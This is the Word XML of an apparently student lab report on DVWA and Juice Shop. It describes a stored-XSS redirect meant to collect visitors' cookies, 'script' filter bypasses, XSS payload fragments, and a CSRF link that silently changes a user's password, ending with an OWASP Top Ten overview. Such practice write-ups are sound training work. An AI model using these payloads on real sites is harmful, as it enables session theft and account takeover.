    <w:p w14:paraId="02AFCAA2" w14:textId="2CFD6279" w:rsidR="005D793B" w:rsidRDefault="005D793B" w:rsidP="001022E9"/>
    <w:p w14:paraId="0FB78997" w14:textId="0F2610DE" w:rsidR="005D793B" w:rsidRDefault="005D793B" w:rsidP="001022E9"/>
    <w:p w14:paraId="4261D22A" w14:textId="3DC873F8" w:rsidR="005D793B" w:rsidRDefault="005D793B" w:rsidP="001022E9"/>
    <w:p w14:paraId="4E15BB59" w14:textId="32C11F66" w:rsidR="005D793B" w:rsidRDefault="005D793B" w:rsidP="001022E9"/>
    <w:p w14:paraId="35DE4C45" w14:textId="2C20C018" w:rsidR="005D793B" w:rsidRDefault="005D793B" w:rsidP="001022E9"/>
    <w:p w14:paraId="7F762810" w14:textId="77777777" w:rsidR="005D793B" w:rsidRDefault="005D793B" w:rsidP="001022E9"/>
    <w:p w14:paraId="3FFB9363" w14:textId="315212AF" w:rsidR="005D793B" w:rsidRDefault="00607F8A" w:rsidP="005D793B">
      <w:r>
        <w:t>Anyways, the objective here is to redirect the user to different page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A9840C" w14:textId="74E057FB" w:rsidR="00607F8A" w:rsidRDefault="00607F8A" w:rsidP="001022E9">
      <w:r>
        <w:t>I do not have any website on mind so I will just create a server that listens to a specific port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9C4067" w14:textId="1311AD4E" w:rsidR="00607F8A" w:rsidRDefault="005D793B" w:rsidP="001022E9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63789AF0" wp14:editId="2EE7F0E7">
            <wp:extent cx="5732780" cy="19875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3C024C47" w14:textId="3F3508D9" w:rsidR="00B05ED2" w:rsidRDefault="00B05ED2" w:rsidP="0087543D"/>
    <w:p w14:paraId="70A14A7D" w14:textId="74BF582A" w:rsidR="00B05ED2" w:rsidRDefault="005D793B" w:rsidP="0087543D">
      <w:r>
        <w:t>Now I can redirect the users to here with their cookies using this code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA62BC8" w14:textId="16E8BAA2" w:rsidR="005D793B" w:rsidRDefault="005D793B" w:rsidP="0087543D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64FEBD86" wp14:editId="16C4CC92">
            <wp:extent cx="5732780" cy="22186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74DCC7FD" w14:textId="77777777" w:rsidR="005D793B" w:rsidRDefault="005D793B" w:rsidP="0087543D"/>
    <w:p w14:paraId="63FD1E6B" w14:textId="1C83AB8E" w:rsidR="00B05ED2" w:rsidRDefault="000D4482" w:rsidP="0087543D">
      <w:r>
        <w:t>Now I will get the cookies for all the users that visit the website.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02592322" w14:textId="36E448A6" w:rsidR="000D4482" w:rsidRDefault="000D4482" w:rsidP="0087543D">
      <w:r w:rsidRPr="000D4482">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: I had to adjust the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>maxlength</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for the Message input because it only allowed 50 characters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC3DED8" w14:textId="332A767D" w:rsidR="000D4482" w:rsidRDefault="000D4482" w:rsidP="0087543D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66478152" wp14:editId="32925743">
            <wp:extent cx="5725160" cy="2298065"/>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34266B4" w14:textId="11F26CB8" w:rsidR="00B05ED2" w:rsidRPr="004D2B19" w:rsidRDefault="004D2B19" w:rsidP="0087543D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D2B19">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What did I just do?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C418851" w14:textId="3FB6950C" w:rsidR="004D2B19" w:rsidRDefault="004D2B19" w:rsidP="0087543D">
      <w:r>
        <w:t xml:space="preserve">I just ruined the XSS (Stored) </w:t>
      </w:r>
      <w:r w:rsidR="00DE2C41">
        <w:t>page,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and I </w:t>
      </w:r>
      <w:r w:rsidR="00DE2C41">
        <w:t>cannot</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> continue working on the other tasks.</w:t>
      </w:r>
      <w:r w:rsidR="00DE2C41">
        <w:t xml:space="preserve"> Why?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1107CBF6" w14:textId="7A163CC8" w:rsidR="00DE2C41" w:rsidRDefault="00DE2C41" w:rsidP="0087543D">
      <w:r>
        <w:t>Because I every time I click on that page it redirects me to another link. How can I fix that?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4226AFBB" w14:textId="429D8A67" w:rsidR="00DE2C41" w:rsidRDefault="00DE2C41" w:rsidP="0087543D">
      <w:r>
        <w:t>No idea yet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D37A05" w14:textId="338A57D6" w:rsidR="00DE2C41" w:rsidRPr="00DE2C41" w:rsidRDefault="00DE2C41" w:rsidP="0087543D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE2C41">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fixed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6A29FF" w14:textId="55D61C9C" w:rsidR="00B05ED2" w:rsidRDefault="00DE2C41" w:rsidP="0087543D">
      <w:r>
        <w:t>I launched another DVWA server and could have forget about the broken DVWA and continue with the new one. Fortunately, I really wanted to solve that problem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1214828A" w14:textId="1173B8D4" w:rsidR="00DE2C41" w:rsidRDefault="00DE2C41" w:rsidP="0087543D">
      <w:r>
        <w:t>Here is what I did:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F864D7F" w14:textId="066286D9" w:rsidR="00DE2C41" w:rsidRDefault="00DE2C41" w:rsidP="0087543D">
      <w:r>
        <w:t>I launched a new DVWA server and went to XSS Stored and I clicked on “Clear Guestbook”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDBDA2C" w14:textId="2471F1B1" w:rsidR="00DE2C41" w:rsidRDefault="000D5055" w:rsidP="0087543D">
      <w:r>
        <w:t>I sent this POST request to Burp Suite and it looks like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4251E9C5" w14:textId="5B81F591" w:rsidR="000D5055" w:rsidRDefault="000D5055" w:rsidP="0087543D"/>
    <w:p w14:paraId="23B6B510" w14:textId="4973A2CC" w:rsidR="000D5055" w:rsidRDefault="000D5055" w:rsidP="0087543D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="778EA9CF" wp14:editId="72E800CD">
            <wp:extent cx="5725160" cy="3562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008E0586" w14:textId="77777777" w:rsidR="00DE2C41" w:rsidRDefault="00DE2C41" w:rsidP="0087543D"/>
    <w:p w14:paraId="76A82743" w14:textId="6A8F1A3A" w:rsidR="00B05ED2" w:rsidRDefault="000D5055" w:rsidP="0087543D">
      <w:r>
        <w:t xml:space="preserve">If I forward this, it will just delete all the messages for the new DVWA. However, that was not the point. I want to send the exact same POST request but for the old DVWA. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEE236D" w14:textId="177E7FD8" w:rsidR="000D5055" w:rsidRDefault="000D5055" w:rsidP="0087543D">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0F2D2402" w14:textId="17A5BB86" w:rsidR="000D5055" w:rsidRDefault="000D5055" w:rsidP="0087543D">
      <w:r>
        <w:t xml:space="preserve">Now I </w:t>
      </w:r>
      <w:r w:rsidR="00C5773E">
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED780B">
        <w:t>click the XSS stored without being redirected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4692E56D" w14:textId="0C7853A1" w:rsidR="00B05ED2" w:rsidRDefault="00B05ED2" w:rsidP="0087543D"/>
    <w:p w14:paraId="7F2CF078" w14:textId="7A123981" w:rsidR="00B05ED2" w:rsidRDefault="00B05ED2" w:rsidP="0087543D"/>
    <w:p w14:paraId="4C17BF19" w14:textId="3EC6269B" w:rsidR="00C5773E" w:rsidRDefault="00C5773E" w:rsidP="00C5773E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc115553346"/>
      <w:r>
        <w:t>XSS Stored</w:t>
      </w:r>
      <w:r w:rsidR="003447C4">
        <w:t xml:space="preserve"> &amp; Reflected</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Medium Level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="28350B44" w14:textId="2E6B01C4" w:rsidR="00B05ED2" w:rsidRDefault="00C5773E" w:rsidP="0087543D">
      <w:r>
        <w:t xml:space="preserve">The difference between Low level and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Medium</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> level in XSS is always the same. They just block the word “script” to prevent the attacker from injecting some </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> there. We can easily bypass this by duplicating the word script of putting some letter in upper case or put some space between the letters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2F84A8" w14:textId="40356424" w:rsidR="00C5773E" w:rsidRDefault="00C5773E" w:rsidP="0087543D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">I tried these 2 tricks, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75000B56" wp14:editId="06EFFFCF">
            <wp:extent cx="5725160" cy="23856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DF59C16" w14:textId="30AD009F" w:rsidR="00C5773E" w:rsidRDefault="00C5773E" w:rsidP="0087543D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53FE6FE7" wp14:editId="12B479B0">
            <wp:extent cx="5725160" cy="27832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4C007F58" w14:textId="4A222311" w:rsidR="00B05ED2" w:rsidRDefault="00B05ED2" w:rsidP="0087543D"/>
    <w:p w14:paraId="1AA823B0" w14:textId="0F517050" w:rsidR="00B05ED2" w:rsidRDefault="00C5773E" w:rsidP="0087543D">
      <w:r>
        <w:t>Yes, they blocked the word script but removing it would create another script tag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472FD717" w14:textId="77777777" w:rsidR="00C5773E" w:rsidRDefault="00C5773E"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6AA07FF3" w14:textId="7C0460EA" w:rsidR="005751E7" w:rsidRDefault="005751E7" w:rsidP="005751E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc115553347"/>
      <w:r>
        <w:t>XSS Stored</w:t>
      </w:r>
      <w:r w:rsidR="005376FD">
        <w:t xml:space="preserve"> &amp; </w:t>
      </w:r>
      <w:r w:rsidR="003447C4">
        <w:t>Reflected</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – High Level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="59D6F215" w14:textId="6D0C0E21" w:rsidR="00B05ED2" w:rsidRDefault="005751E7" w:rsidP="0087543D">
      <w:r>
        <w:t xml:space="preserve">I went to this website </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0286FC35" w14:textId="1F265708" w:rsidR="005751E7" w:rsidRDefault="00000000" w:rsidP="005751E7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:hyperlink r:id="rId93" w:history="1">
        <w:bookmarkStart w:id="35" w:name="_Toc115553348"/>
        <w:r w:rsidR="005751E7" w:rsidRPr="005A0D28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://portswigger.net/web-security/cross-site-scripting/cheat-sheet</w:t>
        </w:r>
        <w:bookmarkEnd w:id="35"/>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="775E6529" w14:textId="7D325A28" w:rsidR="005751E7" w:rsidRDefault="005751E7" w:rsidP="005751E7">
      <w:r>
        <w:t>and found too many XSS cheat sheet codes that most of them work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB9B336" w14:textId="42ECFCBB" w:rsidR="005751E7" w:rsidRPr="005751E7" w:rsidRDefault="005751E7" w:rsidP="005751E7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D44FF5D" wp14:editId="7A66558D">
            <wp:extent cx="5725160" cy="247269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1C1345C8" w14:textId="2A68BE7B" w:rsidR="00B05ED2" w:rsidRDefault="00B05ED2" w:rsidP="0087543D"/>
    <w:p w14:paraId="0F6050B3" w14:textId="0BA7E2A9" w:rsidR="00B05ED2" w:rsidRDefault="005751E7" w:rsidP="0087543D">
      <w:r>
        <w:t xml:space="preserve">I tried a weird one which is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>drag</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to execute and it worked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AF21C5" w14:textId="1F485F45" w:rsidR="005751E7" w:rsidRDefault="005751E7" w:rsidP="0087543D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A71F62F" wp14:editId="34CC5E3F">
            <wp:extent cx="4222115" cy="118491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345F20EA" w14:textId="4BA4D4E5" w:rsidR="00B05ED2" w:rsidRDefault="005751E7" w:rsidP="0087543D">
      <w:r>
        <w:t>When I dr</w:t>
      </w:r>
      <w:r w:rsidR="007C3120">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>g the name, alert pops up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10474E76" w14:textId="1A99CBD4" w:rsidR="0055541D" w:rsidRDefault="0055541D" w:rsidP="0087543D"/>
    <w:p w14:paraId="192D3805" w14:textId="76CACD89" w:rsidR="0055541D" w:rsidRDefault="0055541D" w:rsidP="0087543D"/>
    <w:p w14:paraId="5D3C0A09" w14:textId="6359F27B" w:rsidR="0055541D" w:rsidRDefault="0055541D" w:rsidP="0087543D"/>
    <w:p w14:paraId="0CB83227" w14:textId="1168B100" w:rsidR="0055541D" w:rsidRDefault="0055541D" w:rsidP="0087543D"/>
    <w:p w14:paraId="785B14A1" w14:textId="59335734" w:rsidR="0055541D" w:rsidRDefault="0055541D" w:rsidP="0087543D"/>
    <w:p w14:paraId="21A54354" w14:textId="5C14B465" w:rsidR="0055541D" w:rsidRDefault="0055541D" w:rsidP="0087543D"/>
    <w:p w14:paraId="21598074" w14:textId="01A19BFD" w:rsidR="0055541D" w:rsidRDefault="0055541D" w:rsidP="0087543D"/>
    <w:p w14:paraId="2FE9F514" w14:textId="3D6BD4A3" w:rsidR="0055541D" w:rsidRDefault="0055541D" w:rsidP="0087543D"/>
    <w:p w14:paraId="6CC9446C" w14:textId="0052C53F" w:rsidR="0055541D" w:rsidRDefault="0055541D" w:rsidP="0087543D"/>
    <w:p w14:paraId="0265A57B" w14:textId="108A1DE1" w:rsidR="0055541D" w:rsidRDefault="0055541D" w:rsidP="0087543D"/>
    <w:p w14:paraId="1DA8F973" w14:textId="7676779E" w:rsidR="0055541D" w:rsidRDefault="0055541D" w:rsidP="0087543D"/>
    <w:p w14:paraId="39D7F1DB" w14:textId="2C662DC2" w:rsidR="0055541D" w:rsidRDefault="0055541D" w:rsidP="0087543D"/>
    <w:p w14:paraId="66F64517" w14:textId="10C5667D" w:rsidR="0055541D" w:rsidRDefault="0055541D" w:rsidP="0087543D"/>
    <w:p w14:paraId="7FF988CC" w14:textId="2301ED93" w:rsidR="0055541D" w:rsidRDefault="0055541D" w:rsidP="0087543D"/>
    <w:p w14:paraId="1C03F6CC" w14:textId="3B2AF89A" w:rsidR="0055541D" w:rsidRDefault="00947003" w:rsidP="00947003">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc115553349"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>CSRF (4.1)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="7A901152" w14:textId="77777777" w:rsidR="000441AC" w:rsidRPr="000441AC" w:rsidRDefault="000441AC" w:rsidP="000441AC"/>
    <w:p w14:paraId="6B1C63BB" w14:textId="77777777" w:rsidR="000441AC" w:rsidRDefault="000441AC" w:rsidP="000441AC">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Objective: </w:t>
      </w:r>
      <w:r>
        <w:t>Your task is to make the current user change their own password, without them knowing about their actions, using a CSRF attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F20EBAF" w14:textId="3225AD88" w:rsidR="005751E7" w:rsidRPr="000441AC" w:rsidRDefault="005751E7" w:rsidP="0087543D">
      <w:pPr>
        <w:rPr>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A7F0AE1" w14:textId="7AACF202" w:rsidR="00947003" w:rsidRDefault="00947003" w:rsidP="00947003">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc115553350"/>
      <w:r>
        <w:t>CSRF – Low Level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="7BE47DA8" w14:textId="6A3C09BE" w:rsidR="00947003" w:rsidRDefault="00A04E1F" w:rsidP="00947003">
      <w:r>
        <w:t>We get this form to change the password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4EBF5A" w14:textId="38D8DCA4" w:rsidR="00A04E1F" w:rsidRPr="00947003" w:rsidRDefault="000441AC" w:rsidP="00947003">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BF295B7" wp14:editId="7925C3E3">
            <wp:extent cx="5725160" cy="2734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7D10D6DE" w14:textId="0A100BD9" w:rsidR="0087543D" w:rsidRDefault="0087543D" w:rsidP="0087543D"/>
    <w:p w14:paraId="24A3276D" w14:textId="7AD4755D" w:rsidR="0087543D" w:rsidRDefault="000441AC" w:rsidP="0087543D">
      <w:r>
        <w:t>When we click on change password, we notice that this GET request is being sent:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A76A3E" w14:textId="27FFB51A" w:rsidR="000441AC" w:rsidRDefault="000441AC" w:rsidP="0087543D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B1D3C09" wp14:editId="498254E5">
            <wp:extent cx="5725160" cy="2552065"/>
            <wp:effectExtent l="0" t="0" r="889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0BBBB23C" w14:textId="3AB1502F" w:rsidR="000441AC" w:rsidRDefault="000441AC" w:rsidP="0087543D"/>
    <w:p w14:paraId="3F5DF13E" w14:textId="72691022" w:rsidR="000441AC" w:rsidRDefault="000441AC" w:rsidP="0087543D">
      <w:r>
        <w:t>From this, we find out that all we need to do to change the password is to execute this link.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258655F6" w14:textId="22D4BD07" w:rsidR="000441AC" w:rsidRDefault="000441AC" w:rsidP="0087543D">
      <w:r w:rsidRPr="000441AC">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>http://localhost/vulnerabilities/csrf/?password_new=hacker&amp;password_conf=hacker&amp;Change=Change"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670A2EA7" w14:textId="3D0F3450" w:rsidR="000441AC" w:rsidRDefault="000441AC" w:rsidP="0087543D">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0B56BE5A" w14:textId="19D13BA5" w:rsidR="000441AC" w:rsidRDefault="000441AC" w:rsidP="0087543D"/>
    <w:p w14:paraId="0AE9DE38" w14:textId="48FEC370" w:rsidR="000441AC" w:rsidRDefault="000441AC" w:rsidP="0087543D"/>
    <w:p w14:paraId="0AE47FEA" w14:textId="7B0BDDD1" w:rsidR="000441AC" w:rsidRDefault="000441AC" w:rsidP="0087543D"/>
    <w:p w14:paraId="4C1C7D6A" w14:textId="22282CB9" w:rsidR="000441AC" w:rsidRDefault="000441AC" w:rsidP="000441AC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc115553351"/>
      <w:r>
        <w:t>CSRF – Medium Level</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="7A4873D8" w14:textId="77777777" w:rsidR="000441AC" w:rsidRPr="000441AC" w:rsidRDefault="000441AC" w:rsidP="000441AC"/>
    <w:p w14:paraId="11498268" w14:textId="58C42145" w:rsidR="000441AC" w:rsidRDefault="00077604" w:rsidP="0087543D">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773D431B" w14:textId="01881C85" w:rsidR="007512F8" w:rsidRPr="00077604" w:rsidRDefault="007512F8" w:rsidP="0087543D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61D9F594" wp14:editId="0617E67B">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59974B87" w14:textId="1C39615F" w:rsidR="000441AC" w:rsidRDefault="000441AC" w:rsidP="0087543D"/>
    <w:p w14:paraId="60593F7E" w14:textId="5AE5B7A3" w:rsidR="000441AC" w:rsidRDefault="000441AC" w:rsidP="0087543D"/>
    <w:p w14:paraId="39C2D383" w14:textId="023926A1" w:rsidR="000441AC" w:rsidRDefault="000441AC" w:rsidP="0087543D"/>
    <w:p w14:paraId="658BA063" w14:textId="77777777" w:rsidR="000441AC" w:rsidRDefault="000441AC"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1EDFE133" w:rsidR="00490A30" w:rsidRDefault="009A5302" w:rsidP="009A5302">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc115553352"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Juice Shop</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
      <w:r w:rsidR="00E67820">
        <w:t xml:space="preserve"> </w:t>
      </w:r>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r w:rsidRPr="00CD17BB">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t xml:space="preserve">=”xx”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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D17C9">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>xss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D17C9">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>’)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D6AE11" w14:textId="55AD1D56" w:rsidR="007D17C9" w:rsidRDefault="007D17C9" w:rsidP="007D17C9">
      <w:r>
        <w:t xml:space="preserve">This could work because it takes the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">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r w:rsidRPr="007D17C9">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>’)&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D17C9">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w:t>sscriptcript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D17C9">
        <w:rPr>
          <w:highlight w:val="darkGray"/>
        </w:rPr>
        <w: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2EA95D8F" w:rsidR="001E1C59" w:rsidRDefault="001E1C59" w:rsidP="00412D22">
      <w:r>
        <w:t xml:space="preserve">The database returns </w:t>
      </w:r>
      <w:r w:rsidR="00EE7C20">
        <w:t>true,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and I log in successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3277100A" w14:textId="1CAF285A" w:rsidR="00EE7C20" w:rsidRDefault="00EE7C20" w:rsidP="00412D22"/>
    <w:p w14:paraId="06ABBA93" w14:textId="05213D86" w:rsidR="00EE7C20" w:rsidRDefault="00EE7C20" w:rsidP="00412D22"/>
    <w:p w14:paraId="6741DFEB" w14:textId="65383AF2" w:rsidR="00EE7C20" w:rsidRDefault="00EE7C20" w:rsidP="00412D22"/>
    <w:p w14:paraId="393A4A6E" w14:textId="0C4622C0" w:rsidR="00EE7C20" w:rsidRDefault="00EE7C20" w:rsidP="00412D22"/>
    <w:p w14:paraId="79AFC97B" w14:textId="67D17A8D" w:rsidR="00EE7C20" w:rsidRDefault="00EE7C20" w:rsidP="00412D22"/>
    <w:p w14:paraId="6A5771A0" w14:textId="37AEF160" w:rsidR="00EE7C20" w:rsidRDefault="00EE7C20" w:rsidP="00412D22"/>
    <w:p w14:paraId="4D6EB914" w14:textId="2BBF1FDD" w:rsidR="00EE7C20" w:rsidRDefault="00EE7C20" w:rsidP="00412D22"/>
    <w:p w14:paraId="65D4DA2E" w14:textId="3F32ABB1" w:rsidR="00EE7C20" w:rsidRDefault="00EE7C20" w:rsidP="00EE7C20">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc115553353"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>OWASP Top Ten</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="2B4F4858" w14:textId="2C1F134C" w:rsidR="00EE7C20" w:rsidRDefault="00EE7C20" w:rsidP="00EE7C20">
      <w:r>
        <w:t xml:space="preserve">Open Web Application Security Project is an </w:t>
      </w:r>
      <w:r w:rsidR="00773220">
        <w:t>open-source</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> software that aims to improve the security of</w:t>
      </w:r>
      <w:r w:rsidR="00773220">
        <w:t xml:space="preserve"> web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> applications</w:t>
      </w:r>
      <w:r w:rsidR="00773220">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9F1D18" w14:textId="74A88E49" w:rsidR="00773220" w:rsidRDefault="00773220" w:rsidP="00EE7C20">
      <w:r>
        <w:t>OWASP Top Ten refers to the top 10 critical security risks to web applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016772F2" w14:textId="08BF9DD1" w:rsidR="00773220" w:rsidRDefault="00773220" w:rsidP="00EE7C20">
      <w:r>
        <w:t>The current version</w:t>
      </w:r>
      <w:r w:rsidR="00B532A1">
        <w:t xml:space="preserve"> of the list</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> was updated in 2021 whereas the previous one was in 2017</w:t>
      </w:r>
      <w:r w:rsidR="00B532A1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A15FDB1" w14:textId="21C11609" w:rsidR="00B532A1" w:rsidRDefault="00B532A1" w:rsidP="00EE7C20">
      <w:r>
        <w:t>2021 added some new vulnerabilities. However, most of them remain on the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07771CCF" w14:textId="336552B2" w:rsidR="00B532A1" w:rsidRDefault="00B532A1" w:rsidP="00EE7C20">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="608B5926" wp14:editId="5F883274">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849BB72" w14:textId="7E8282DC" w:rsidR="0054284C" w:rsidRPr="00B532A1" w:rsidRDefault="00B532A1" w:rsidP="00412D22">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B532A1">
        <w:rPr>
          <w:sz w:val="14"/>
